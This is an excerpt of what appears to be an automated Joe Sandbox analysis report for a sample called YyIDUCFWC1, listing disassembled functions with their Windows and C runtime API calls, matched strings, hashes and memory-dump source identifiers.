                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
                                                                                                                                                                                                                                              • API String ID: 3807434085-412673420
                                                                                                                                                                                                                                              • Opcode ID: 7f710339174206a67f67f04a13cae66109dab6930e830e0b76884ccdde4b4ae3
                                                                                                                                                                                                                                              • Instruction ID: c338199b0f5ed36234b23b8162152a66733cc6915be9c9f3c2cabd49e2427396
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f710339174206a67f67f04a13cae66109dab6930e830e0b76884ccdde4b4ae3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79B13C716083809FD320DB69C890BDBBBE9AFD9314F14891DE59D83751DB31A909CBA3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF3C10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32(?,?,FF0C5935), ref: 6CEF3C49
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF3C81
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF3D26
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF3D30
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF3D89
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$ArrayElementInitSafe
                                                                                                                                                                                                                                              • String ID: ljl
                                                                                                                                                                                                                                              • API String ID: 4110538090-1208423595
                                                                                                                                                                                                                                              • Opcode ID: d15b583781e6f1455fe40024b539ba82b8fefaa5eb0a02d2d181abbd973c0bbd
                                                                                                                                                                                                                                              • Instruction ID: b7d95f6ff907a2e9d695cf28ff8d3c482bb7bf91da72a8e679ad18613a0d7d5e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d15b583781e6f1455fe40024b539ba82b8fefaa5eb0a02d2d181abbd973c0bbd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC617D76A00249DFCB00DFA8C8809EEBBB5FF49314F25859DE525AB750C731AD46CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF31250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CF3126E
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF312E0
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF31305
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF31342
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF3135F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: deque<T> too long
                                                                                                                                                                                                                                              • API String ID: 4034224661-309773918
                                                                                                                                                                                                                                              • Opcode ID: 6a6ae3e8c542ec9c08b7ba2cc57190cce8be66edbe959dfffe109a2f0f69c2f5
                                                                                                                                                                                                                                              • Instruction ID: 10e372b1ad40c8b4eeb1454d593f4abc869609a42f7dd55358fb17134381db14
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a6ae3e8c542ec9c08b7ba2cc57190cce8be66edbe959dfffe109a2f0f69c2f5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C41E472A04214ABD704CE28DC91A6BB7E6EBD4214F1DC62DE80DD7B45EE34ED0987E1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF313A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CF313BE
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF31431
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF31456
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF31493
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF314B0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: deque<T> too long
                                                                                                                                                                                                                                              • API String ID: 4034224661-309773918
                                                                                                                                                                                                                                              • Opcode ID: a67903e15ffc65985fd95cdf47e7121ae119ae76b7305dbf4ccdc403a4fa0881
                                                                                                                                                                                                                                              • Instruction ID: db722e4666096c8766b377e0c5db9095ceffd641b0b315263204c9a4b109081e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a67903e15ffc65985fd95cdf47e7121ae119ae76b7305dbf4ccdc403a4fa0881
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F241D372A04214ABC704CE28DC9196BB7E6EBC4314F19C62DE84DD7B45EE34ED0987E1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED4D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CED4DA9
                                                                                                                                                                                                                                                • Part of subcall function 6CF39125: std::exception::exception.LIBCMT ref: 6CF3913A
                                                                                                                                                                                                                                                • Part of subcall function 6CF39125: __CxxThrowException@8.LIBCMT ref: 6CF3914F
                                                                                                                                                                                                                                                • Part of subcall function 6CF39125: std::exception::exception.LIBCMT ref: 6CF39160
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CED4DCA
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CED4DE5
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CED4E4D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                              • API String ID: 443534600-4289949731
                                                                                                                                                                                                                                              • Opcode ID: ae20df99c8ec4a211cf0871209ad3b991a246ccb881b7c8a4090dc0cb985e94b
                                                                                                                                                                                                                                              • Instruction ID: 3343d90998743b636c2b333d5b0b9058df51823d04af3189069f09a97d36e32d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae20df99c8ec4a211cf0871209ad3b991a246ccb881b7c8a4090dc0cb985e94b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4831EA323042119FD7248F6CE880A5AF3F5ABA1324B314A2FE555CFB40C771F84183A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF444E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                                              • String ID: throw(
                                                                                                                                                                                                                                              • API String ID: 168861036-3159766648
                                                                                                                                                                                                                                              • Opcode ID: cfe4169fe86c848fcca30ffc5da04a835d3af2b46eff0e3576c5df8079093e88
                                                                                                                                                                                                                                              • Instruction ID: f97126fdc09f367d77b2ef7689623ed0cefb5f74d40036559e69c683b6774884
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfe4169fe86c848fcca30ffc5da04a835d3af2b46eff0e3576c5df8079093e88
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF01B174A00109AFCF04DFA4D881EEE7FB9EB44308F408155E905AB796DB70EA4A8B90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF3E9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6CF69880,00000008,6CF3EAC1,00000000,00000000,?,?,6CF3D7DD,6CF39DEF,00000000,?,6CF39BD4,6CED1290,FF0C5935), ref: 6CF3E9CA
                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 6CF3E9FE
                                                                                                                                                                                                                                                • Part of subcall function 6CF42438: __mtinitlocknum.LIBCMT ref: 6CF4244E
                                                                                                                                                                                                                                                • Part of subcall function 6CF42438: __amsg_exit.LIBCMT ref: 6CF4245A
                                                                                                                                                                                                                                                • Part of subcall function 6CF42438: EnterCriticalSection.KERNEL32(6CF39BD4,6CF39BD4,?,6CF3EA03,0000000D), ref: 6CF42462
                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6CF3EA0B
                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 6CF3EA1F
                                                                                                                                                                                                                                              • ___addlocaleref.LIBCMT ref: 6CF3EA3D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                              • String ID: KERNEL32.DLL
                                                                                                                                                                                                                                              • API String ID: 637971194-2576044830
                                                                                                                                                                                                                                              • Opcode ID: 5caa8a8645767132dbc427e640d58fb91b436cd6c56e0683e3c1ed243a79b22b
                                                                                                                                                                                                                                              • Instruction ID: c3c2459eb7553afd27bf46659433146babde17ad28c165f435fb86dd655e57aa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5caa8a8645767132dbc427e640d58fb91b436cd6c56e0683e3c1ed243a79b22b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68015B71945B00AFD7609F65C405789BBE0EF51328F60990AD59A96BA0CB70AA48CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEE120 Relevance: 9.4, APIs: 6, Instructions: 364COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CEEE29B
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CEEE2B6
                                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CEEE2D7
                                                                                                                                                                                                                                                • Part of subcall function 6CEF5760: std::tr1::_Xweak.LIBCPMT ref: 6CEF5769
                                                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEEE309
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEEE523
                                                                                                                                                                                                                                              • InterlockedCompareExchange.KERNEL32(6CF7C6A4,45524548,4B4F4F4C), ref: 6CEEE544
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2722669376-0
                                                                                                                                                                                                                                              • Opcode ID: 41cf2e5cc3f34fbf3f2dbf43b190a992b6e7a23a9418016430f48b645fb7f93f
                                                                                                                                                                                                                                              • Instruction ID: 04cba6ab509acac0790656a944c808a2461cb32c8bced3c8bdc2878498dddd3e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41cf2e5cc3f34fbf3f2dbf43b190a992b6e7a23a9418016430f48b645fb7f93f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6D1C371A006059FDB10CFA4C894BDE77B9AF49348F348569E905AB780E774ED48CBE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 9b7f2f22dbcccb50cbf6eaaa32489518328b09ebd5ff9e23cfe4b5e8f4826e13
                                                                                                                                                                                                                                              • Instruction ID: 274918c86c20299201b04b5f2a202e4a94ee7d9bc0c8051c0ad06351aaaa35e9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b7f2f22dbcccb50cbf6eaaa32489518328b09ebd5ff9e23cfe4b5e8f4826e13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D414B74A016189FCB10DFA9C980A5AB7FAAF89308F30858AE519DB755DB31ED42CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
